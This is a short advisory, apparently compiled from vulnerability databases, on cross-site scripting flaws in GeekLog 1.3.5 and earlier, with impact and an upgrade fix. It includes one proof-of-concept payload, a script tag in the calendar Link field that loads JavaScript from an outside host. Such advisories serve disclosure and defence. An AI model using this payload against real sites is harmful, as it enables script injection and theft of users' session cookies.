[原文]Cross-site scripting vulnerabilities in GeekLog 1.3.5 and earlier allow remote attackers to execute arbitrary script via (1) the url variable in the Link field of a calendar event, (2) the topic parameter in index.php, or (3) the title parameter in comment.php.
Geeklog does not filter script code from URL parameters, making it prone to cross-site scripting attacks. Attacker-supplied script code may be included in a malicious link to the 'index.php' or 'comment.php' script. Such a malicious link might be included in a HTML e-mail or on a malicious webpage.
This may enable a remote attacker to steal cookie-based authentication credentials from legitimate users of a host running Geeklog.
This issue has been reported to exist in Geeklog 1.3.5, earlier versions may also be susceptible to this issue.
Geeklog 1.3.5 Calendar Event Form Script Injection Vulnerability (EDBID:21528)
Geeklog does not sufficiently sanitize script code from form fields, making it prone to script injection attacks.
Attacker-supplied script code may potentially end up in webpages generated by Geeklog and will execute in the browser of a user who views such pages, in the security context of the website.
Link input($url) :<scriptsrc="http://forum.olympos.org/f.js">Alper</script>
Geeklog contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the "title" parameter upon submission to the comment.php script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.
Upgrade to version 1.3.5sr1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.